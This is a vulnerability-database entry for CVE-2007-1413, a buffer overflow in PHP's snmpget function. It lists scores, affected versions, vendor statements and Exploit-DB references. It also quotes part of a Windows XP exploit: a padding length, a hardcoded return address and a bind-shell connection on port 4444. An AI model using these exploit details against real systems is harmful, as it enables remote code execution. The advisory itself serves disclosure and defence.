CVE-2007-1413
Published 2007-03-12
Priority P3 · 43 · high · CVSS 2.0: 7.5
AV:N / AC:L / Au:N / C:P / I:P / A:P
EXPLOIT
EPSS: 11.09% (95.4th percentile)
Buffer overflow in the snmpget function in the snmp extension in PHP 5.2.3 and earlier, including PHP 4.4.6 and probably other PHP 4 versions, allows context-dependent attackers to execute arbitrary code via a long value in the third argument (object id).
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| php | php | <= 5.2.3 | — |
| php | php | — | — |
CVSS provenance
nvd · v2.0 · 7.5 HIGH · AV:N/AC:L/Au:N/C:P/I:P/A:P
vendor_redhat · 7.5 HIGH
Red Hat
CVE-2007-1413: Buffer overflow in the snmpget function in the snmp extension in PHP 5
vendor_redhat·CVSS 7.5
CVE-2007-1413 [HIGH] CVE-2007-1413: Buffer overflow in the snmpget function in the snmp extension in PHP 5
Statement: Not vulnerable. The php-snmp package as shipped with Red Hat Enterprise Linux 4 and 5 uses net-snmp, which is not vulnerable to this issue.
GHSA
GHSA-j942-443j-vqgr: Buffer overflow in the snmpget function in the snmp extension in PHP 5
ghsa_unreviewed·2022-05-01
CVE-2007-1413 [HIGH] CWE-119 GHSA-j942-443j-vqgr: Buffer overflow in the snmpget function in the snmp extension in PHP 5
No detection rules found.
Exploit-DB
PHP 5.2.3 - 'snmpget()' object id Local Buffer Overflow (EDI)
exploitdb·2007-08-09
CVE-2007-1413 PHP 5.2.3 - 'snmpget()' object id Local Buffer Overflow (EDI)
---
http://milw0rm.com/exploits/4204
317 Bytes, Windows Command Shell Bind TCP Inline, Architecture x86, Windows TinyXP - vm.
GET /script.php HTTP/1.1\n
telnet 192.168.2.32 4444
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\apache>
*/
if (!extension_loaded("snmp")) {
die("snmp extension required!");
}
$buffer = str_repeat("A",254);
$ret = "\xD7\x98\x95\x7C"; #shell32.dll ->CALL EDI WindowsXP
Exploit-DB
PHP 5.2.3 - 'snmpget()' Object id Local Buffer Overflow
exploitdb·2007-07-20
CVE-2007-1413 PHP 5.2.3 - 'snmpget()' Object id Local Buffer Overflow
---
# milw0rm.com [2007-07-20]
Exploit-DB
PHP 4.4.6 - 'snmpget()' Object id Local Buffer Overflow
exploitdb·2007-03-09
CVE-2007-1413 PHP 4.4.6 - 'snmpget()' Object id Local Buffer Overflow
---
# milw0rm.com [2007-03-09]
http://retrogod.altervista.org/php_446_snmpget_local_bof.html
http://secunia.com/advisories/24440
http://www.securityfocus.com/bid/22893
https://exchange.xforce.ibmcloud.com/vulnerabilities/35517
https://www.exploit-db.com/exploits/3439
https://www.exploit-db.com/exploits/4204